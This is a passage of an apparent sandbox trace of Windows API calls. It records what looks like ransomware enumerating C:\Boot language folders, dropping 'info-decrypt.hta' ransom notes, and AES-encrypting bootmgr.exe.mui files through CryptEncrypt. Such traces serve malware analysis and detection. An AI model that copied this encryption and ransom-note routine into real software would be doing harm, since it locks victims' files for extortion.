nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK", lpFilePart=0x0) returned 0xd [0194.027] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\", lpFilePart=0x0) returned 0xe [0194.027] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f010 [0194.027] FindNextFileW (in: hFindFile=0xb7f010, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.027] FindNextFileW (in: hFindFile=0xb7f010, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0194.027] FindNextFileW (in: hFindFile=0xb7f010, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0194.027] FindClose (in: hFindFile=0xb7f010 | out: hFindFile=0xb7f010) returned 1 [0194.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0194.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0194.028] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0194.028] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0194.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0194.028] GetFileAttributesExW (in: lpFileName="C:\\Boot\\zh-HK\\info-decrypt.hta" (normalized: "c:\\boot\\zh-hk\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0194.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0194.028] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0194.028] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0194.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0194.028] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\info-decrypt.hta" (normalized: "c:\\boot\\zh-hk\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x45c [0194.028] GetFileType (hFile=0x45c) returned 0x1 [0194.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0194.028] GetFileType (hFile=0x45c) returned 0x1 [0194.029] WriteFile (in: hFile=0x45c, lpBuffer=0x38c2fd8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x38c2fd8*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0194.030] WriteFile (in: hFile=0x45c, lpBuffer=0x38c2fd8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x38c2fd8*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0194.030] CloseHandle (hObject=0x45c) returned 1 [0194.030] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0194.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0194.030] GetFileAttributesExW (in: lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x38c3ff4 | out: lpFileInformation=0x38c3ff4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250)) returned 1 [0194.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0194.031] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0194.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0194.031] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0194.031] GetFileType (hFile=0x45c) returned 0x1 [0194.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0194.031] GetFileType (hFile=0x45c) returned 0x1 [0194.031] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x11250 [0194.031] ReadFile (in: hFile=0x45c, lpBuffer=0x38c416c, nNumberOfBytesToRead=0x11250, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x38c416c*, lpNumberOfBytesRead=0x6a7f1bc*=0x11250, lpOverlapped=0x0) returned 1 [0194.061] CloseHandle (hObject=0x45c) returned 1 [0194.062] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66bb598) returned 1 [0194.062] CryptGenRandom (in: hProv=0x66bb598, dwLen=0x10, pbBuffer=0x38d5710 | out: pbBuffer=0x38d5710) returned 1 [0194.801] CryptImportKey (in: hProv=0x66bb598, pbData=0x38b2f58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f610) returned 1 [0194.802] CryptContextAddRef (hProv=0x66bb598, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.802] CryptContextAddRef (hProv=0x66bb598, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.802] CryptDuplicateKey (in: hKey=0xb7f610, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f490) returned 1 [0194.802] CryptContextAddRef (hProv=0x66bb598, pdwReserved=0x0, dwFlags=0x0) returned 1 [0194.802] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x4, pbData=0x38b3038*=0x1, dwFlags=0x0) returned 1 [0194.802] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x1, pbData=0x38b3004, dwFlags=0x0) returned 1 [0194.802] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x38b3048*, pdwDataLen=0x6a7f188*=0x11260, dwBufLen=0x11260 | out: pbData=0x38b3048*, pdwDataLen=0x6a7f188*=0x11260) returned 1 [0194.803] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x38c42cc*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x38c42cc*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0194.804] CryptDestroyKey (hKey=0xb7f610) returned 1 [0194.804] CryptReleaseContext (hProv=0x66bb598, dwFlags=0x0) returned 1 [0194.804] CryptReleaseContext (hProv=0x66bb598, dwFlags=0x0) returned 1 [0194.805] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-HK\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0194.805] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0194.805] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0194.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0194.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0194.807] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0194.807] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\", lpFilePart=0x0) returned 0xe [0194.807] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f610 [0194.808] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.808] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0194.808] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0194.808] FindClose (in: hFindFile=0xb7f610 | out: hFindFile=0xb7f610) returned 1 [0194.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0194.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0194.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0194.809] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW", lpFilePart=0x0) returned 0xd [0194.809] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\", lpFilePart=0x0) returned 0xe [0194.809] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f610 [0194.809] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.809] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0194.810] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0194.810] FindClose (in: hFindFile=0xb7f610 | out: hFindFile=0xb7f610) returned 1 [0194.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0194.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0194.810] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0194.810] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0194.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0194.810] GetFileAttributesExW (in: lpFileName="C:\\Boot\\zh-TW\\info-decrypt.hta" (normalized: "c:\\boot\\zh-tw\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0194.811] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0194.811] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0194.811] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0194.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0194.811] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\info-decrypt.hta" (normalized: "c:\\boot\\zh-tw\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x4e0 [0194.812] GetFileType (hFile=0x4e0) returned 0x1 [0194.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0194.812] GetFileType (hFile=0x4e0) returned 0x1 [0194.812] WriteFile (in: hFile=0x4e0, lpBuffer=0x38c7144*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x38c7144*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0194.813] WriteFile (in: hFile=0x4e0, lpBuffer=0x38c7144*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x38c7144*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0194.814] CloseHandle (hObject=0x4e0) returned 1 [0194.814] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0194.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0194.814] GetFileAttributesExW (in: lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x38c8160 | out: lpFileInformation=0x38c8160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240)) returned 1 [0194.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0194.815] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0194.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0194.815] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0194.815] GetFileType (hFile=0x4e0) returned 0x1 [0194.815] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0194.815] GetFileType (hFile=0x4e0) returned 0x1 [0194.815] GetFileSize (in: hFile=0x4e0, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x11240 [0194.815] ReadFile (in: hFile=0x4e0, lpBuffer=0x38c82d8, nNumberOfBytesToRead=0x11240, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x38c82d8*, lpNumberOfBytesRead=0x6a7f1bc*=0x11240, lpOverlapped=0x0) returned 1 [0194.986] CloseHandle (hObject=0x4e0) returned 1 [0194.986] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66bb950) returned 1 [0194.987] CryptGenRandom (in: hProv=0x66bb950, dwLen=0x10, pbBuffer=0x38d986c | out: pbBuffer=0x38d986c) returned 1 [0195.370] CryptImportKey (in: hProv=0x66bb950, pbData=0x3b2f730, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7fcd0) returned 1 [0195.371] CryptContextAddRef (hProv=0x66bb950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.371] CryptContextAddRef (hProv=0x66bb950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.371] CryptDuplicateKey (in: hKey=0xb7fcd0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7fd10) returned 1 [0195.371] CryptContextAddRef (hProv=0x66bb950, pdwReserved=0x0, dwFlags=0x0) returned 1 [0195.371] CryptSetKeyParam (hKey=0xb7fd10, dwParam=0x4, pbData=0x3b2f810*=0x1, dwFlags=0x0) returned 1 [0195.371] CryptSetKeyParam (hKey=0xb7fd10, dwParam=0x1, pbData=0x3b2f7dc, dwFlags=0x0) returned 1 [0195.371] CryptEncrypt (in: hKey=0xb7fd10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b2f820*, pdwDataLen=0x6a7f188*=0x11250, dwBufLen=0x11250 | out: pbData=0x3b2f820*, pdwDataLen=0x6a7f188*=0x11250) returned 1 [0195.372] CryptEncrypt (in: hKey=0xb7fd10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3b40a94*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x3b40a94*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0195.374] CryptDestroyKey (hKey=0xb7fcd0) returned 1 [0195.374] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0195.374] CryptReleaseContext (hProv=0x66bb950, dwFlags=0x0) returned 1 [0195.374] GetFullPathNameW (in: lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\zh-TW\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0195.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0195.374] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0195.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0195.377] CoUninitialize () [0195.378] SysReAllocStringLen (in: pbstr=0x6a7f908*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6a7f908*="KERNEL32.DLL") returned 1 [0195.378] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0195.379] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0195.382] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 112 os_tid = 0xb34 [0131.262] SysReAllocStringLen (in: pbstr=0x692fafc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x692fafc*="KERNEL32.DLL") returned 1 [0131.262] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.262] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.264] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.265] SysReAllocStringLen (in: pbstr=0x692fafc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x692fafc*="KERNEL32.DLL") returned 1 [0131.265] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.265] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.267] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.268] SysReAllocStringLen (in: pbstr=0x692fad8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x692fad8*="KERNEL32.DLL") returned 1 [0131.268] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.268] GetModuleHandleW 